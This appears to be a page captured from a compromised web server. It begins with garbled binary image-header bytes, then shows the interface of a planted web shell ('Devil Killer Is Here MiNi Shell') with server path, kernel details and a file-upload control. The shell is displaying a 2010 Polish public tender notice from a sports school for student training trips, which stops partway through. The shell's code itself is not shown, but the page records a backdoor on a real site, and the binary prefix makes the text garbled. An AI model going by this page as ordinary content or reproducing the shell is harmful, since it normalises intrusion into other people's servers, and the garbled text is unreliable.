JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100415/105714-N-2010.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych  - trzy grupy sportowe</b><br>
<b>Numer ogłoszenia: 105714 - 2010; data zamieszczenia: 15.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Sportowych im. Polskich Olimpijczyków , ul. Chopina 34, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 0-32 2626869, 2626968, faks 0-32 2626968.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zssdg.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych  - trzy grupy sportowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - trzy grupy sportowe,

Zadanie 1 - Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa pływaków,
Zadanie 2 - Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa siatkarzy- 2grupy,

Zadanie 3 -Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa lekkoatletów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wpis w rejestrze organizatorów turystyki i pośredników turystycznych - zgodnie z ustawą o usługach turystycznych z dnia 29 sierpnia 1997 r. (Dz.U. z 2004r., Nr 223, poz. 2268 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1 W okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych są również w trakcie wykonywania, usług
w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.:
2. Dwie usługi, polegającej na zorganizowaniu wyjazdów turystycznych tj. wycieczki, pielgrzymki, kolonie, obozy itp., o wartości nie mniejszej niż 15.000,00 zł brutto każda, wraz z załączeniem dokumentów potwierdzających, że usługa ta została wykonana należycie, (np. referencją).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Dodatkowo do oferty należy załączyć:
1.Oświadczenia, o spełnieniu warunków określonych w art. 22 ust. 1 pkt 1-4 Ustawy - wzór wykazu Załącznik nr 1 do SIWZ (wskazana data podpisania);
2.Druk Ofertowy - załącznik nr 3 dla Zadania 1 i (-lub) 2 i (-lub) 3 - wskazana data podpisania.
3.Wycenę przedmiotu zamówienia wykonaną w oparciu o kalkulację cenową wypoczynku młodzieży (oddzielnie dla każdego zadania) stanowiące załącznik  nr 3.1. i (-lub) 3.2. i (-lub) 3.3 - wskazana aktualna data podpisania dokumentu.
4.Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione, bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie, przedłożone w formie oryginału lub kopii   poświadczonej  przez notariusza (dotyczy również spółki cywilnej). 
5.Krótka charakterystyka obiektu w tym opis miejscowości, obiektu mieszkalnego, obiektów sportowych przeznaczonych dla uczestników wycieczki szkoleniowej musi zawierać wszystkie elementy wymagane przez Zamawiającego w SIWZ dla każdego zadania (Wykonawca może zamieścić fotografie lub foldery placówki, ośrodka).
6.Zobowiązanie, w szczególności pisemne, innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Atrakcyjność obiektu - 5</li>
<li>3 - wysokość dziennej stawki żywieniowej - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej  umowy w  stosunku do treści  oferty, na podstawie której   dokonano wyboru Wykonawcy, w zakresie:
1. zmiany terminu wykonania zamówienia oraz  terminów pośrednich, o których mowa we  wzorze umowy, w następujących przypadkach:
1.1. wystąpienie (siły wyższej). (Siła wyższa) oznacza wydarzenie nieprzewidywalne i  poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
1.2. wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających przeprowadzenie zamówienia np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
1.3. wystąpienia masowych zachorowań wśród uczniów, powodujące niemożliwość ich uczestniczenia w wyjeździe we wskazanym terminie, oraz  w zakresie zmiany zadeklarowanej ilości uczestników  na podstawie rzeczywistej liczby zgłoszeń złożonych przez rodziców oraz rezygnacji z udziału w wyjeździe z uzasadnionych przyczyn w terminie 7 dni przed  datą wyjazdu.  

2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących 
okoliczności:
2.1. zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca,
3. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w pkt. 2 SIWZ, Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o  dokonanie wskazanej zmiany.
4. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać
uzasadnienie faktyczne i prawne.
6. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
7. Pozostałe kwestie odnoszące się do umowy uregulowane są w Załączniku nr 5 do
    SIWZ  projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zssdg.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Sportowych 
im. Polskich Olimpijczyków
ul. Chopina 34
41-300 Dąbrowa Górnicza
pokój 21 A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2010 godzina 09:00, miejsce: Zespół Szkół Sportowych 
im. Polskich Olimpijczyków
ul. Chopina 34
41-300 Dąbrowa Górnicza
Pokój 21A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni 
spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez 
dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i  oświadczenia wymienione w pkt 9.2. (ppkt 9.2.1.; 9.2.2.; SIWZ) przez
każdego z  nich. Dokumenty i oświadczenia  wymienione w pkt. 9.1. SIWZ (ppkt 9.1.2. do 9.1.4. SIWZ oraz 9.3.1.; 9.3.2.; 9.3.3.; 9.3.4.;) wspólnie. Oświadczenie wymienione w pkt. 9.1.1. SIWZ - winno być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ winien być podpisany przez uprawnionych przedstawicieli Wykonawców.
3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich
w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia 
umowy w sprawie   zamówienia publicznego. 
4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.

II. Wymagania dotyczące zabezpieczenia należytego wykonania umowy.
1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10% ceny brutto podanej w ofercie (dla każdego z zadań osobno).
2. Okres obowiązywania zabezpieczenia należytego wykonania umowy od dnia podpisania umowy do ostatniego dnia realizacji zamówienia puls 7 dni (odpowiednio do każdego zadania).

III. 1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 9.2.2. SIWZ, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;

2. Dokumenty, o których mowa w pkt. 1 lit. a) Uwag, powinny być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa pkt. 1 Uwag zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania pkt. 2 Uwag stosuje się odpowiednio.
4. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
5.	Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, na zasobach których na zasadach określonych w art. 26 ust. 2b ustawy polega wykonawca, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
IV. W pkt. 2.II) Ogłoszenia - Czas trwania zamówienia lub termin wykonania - Zamawiający podał w dniach (5 dni), czas trwania wycieczki szkoleniowej dla jednej grupy. Wymagany termin i czas trwania wycieczki szkoleniowej dla poszczególnych grup został podany w poszczególnych częściach Ogłoszenia od 1 do 3..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa pływaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW / TERMIN WYJAZDU
1.1. Przewidywana ilość uczestników 60 osób (młodzież osoby płatne) + 5 opiekunów (osoby bezpłatne).
1.2. Wymagany termin pobytu od 06.09.2010 r. do 11.09.2010 r.  (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu wyjazdu).

2.MIEJSCOWOŚĆ / ŚRODEK TRANSPORTU
2.1. Miejscowość:  oddalona do 300 km od Dąbrowy Górniczej.
2.2. Środek transportu - autokar, bus.
	
3.OBIEKT / BAZA NOCLEGOWA / BAZA TRENINGOWA
3.1.Baza noclegowa - pokoje 2,3,4 osobowe lub domki kempingowe ogrzewane. Zamawiający nie dopuszcza łóżek piętrowych.
 3.2.Osobne pokoje dla opiekunów (osobno dla kobiet i osobno mężczyzn).
 3.3.  Pokoje wyposażone w pełny węzeł sanitarny. 
3.4.  Zakwaterowanie w jednym ośrodku wraz ze stołówką.
3.5.  Basen kryty - 25 m ( 5-6 torów, liny torowe grube-sportowe, chorągiewki nawrotowe)- 2 grupy wchodzące po sobie  po 1,5 godz. każda rano i 2 grupy wchodzące po sobie  po 1,5 godz. każda popołudniu ( łącznie 6 godzin  dziennie). Basen w miejscu zakwaterowania.
3.6. Pełnowymiarowe boisko trawiaste do piłki nożnej, boisko do gry w piłkę siatkową plażową (na  terenie ośrodka do  pełnej dyspozycji uczestników obozu)
 3.7. Odnowa biologiczna na terenie ośrodka ( sauna i jakuzzi - codziennie 1 godzina po treningu rano i 1 godzina po  treningu popołudniu)
3.8. Korty tenisowe na terenie ośrodka ( codziennie do pełnej dyspozycji uczestników obozu ).
3.9. Akwen wodny (jezioro) do 500 m od ośrodka z możliwością uprawiania sportów wodnych. Do dyspozycji uczestników obozu min. 3 kajaki, 3 łódki, 3 rowery wodne wliczone w cenę oferty.

4.OPIEKA MEDYCZNA
 4.1. Lekarz dochodzący (na wezwanie).
 4.2. Izolatka dla chorych.
 4.3. Zapewnienie leków pierwszej pomocy.
	
5.WYŻYWIENIE
  5.1 Trzy posiłki dziennie z podwieczorkiem /śniadanie, obiad,  kolacja/.
  5.2. Suchy prowiant na podróż, sok
  5.3. Codziennie 0,5 l wody mineralnej niegazowanej nisko zmineralizowanej dla każdego uczestnika obozu.
	
6.W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
6.1. Zapewnienia bezpłatnego pobytu i przejazdu dla  opiekunów. 
6.2. Ubezpieczenie uczestników w czasie podróży i pobytu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność obiektu - 5</li>
<li>3. Dzienna stawka żywieniowa - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa siatkarzy /dwie grupy/.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW / TERMIN WYJAZDU
1.1. Przewidywana ilość uczestników  130 osób (młodzież osoby płatne) + 12 opiekunów (osoby bezpłatne).
1.2. Wymagany termin pobytu I grupa 70 uczestników +6 trenerów od 06 do 11 września 2010r.(pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu).
1.3. Wymagany termin pobytu II grupa 60 uczestników +6 trenerów od 13 do 18 września 2010r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy się obiadem w dniu wyjazdu).
	
2.MIEJSCOWOŚĆ / ŚRODEK TRANSPORTU
2.1. Miejscowość:  oddalona do 300 km od Dąbrowy Górniczej.
2.2. Środek transportu - autokar, bus.

3.OBIEKT / BAZA NOCLEGOWA / BAZA TRENINGOWA
3.1  Baza noclegowa - pokoje 2,3,4 osobowe. Zamawiający nie dopuszcza łóżek piętrowych.
3.2  Zakwaterowanie w jednym ośrodku wraz ze stołówką.
3.3  Osobne pokoje dla opiekunów.(osobno dla kobiet i osobno mężczyzn)
3.4  Pokoje wyposażone w pełen węzeł sanitarny.
3.5  Sala gimnastyczna z możliwością rozłożenia trzech boisk pełnowymiarowych do siatkówki lub trzech sal  pełnowymiarowych oddalonych do 2 km od miejsca zakwaterowania. W przepadku oddalenia sal od miejsca zakwaterowania większym niż 2 km konieczne jest zapewnienie transportu. Transport wliczony w cenę oferty. Treningi dwa razy dziennie w 	godzinach od 10.00. do 13.00 i od 16.00 do 19.00 ( Kolacja wydawana nie wcześniej niż o godz. 19.45).

4.OPIEKA MEDYCZNA
 4.1. Lekarz dochodzący (na wezwanie).
 4.2. Izolatka dla chorych.
4.3. Zapewnienie leków pierwszej pomocy.

5.WYŻYWIENIE
 5.1 Trzy posiłki dziennie z podwieczorkiem /śniadanie, obiad,  kolacja/.
 5.2.Suchy prowiant na podróż, sok
 5.3. Codziennie 0,5 l wody mineralnej niegazowanej nisko zmineralizowanej dla każdego uczestnika obozu.
	

6.W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
